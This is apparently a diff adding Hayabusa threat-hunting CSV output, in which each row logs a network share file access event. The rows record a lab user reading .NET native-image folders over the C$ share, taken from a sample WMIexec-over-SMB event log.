+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
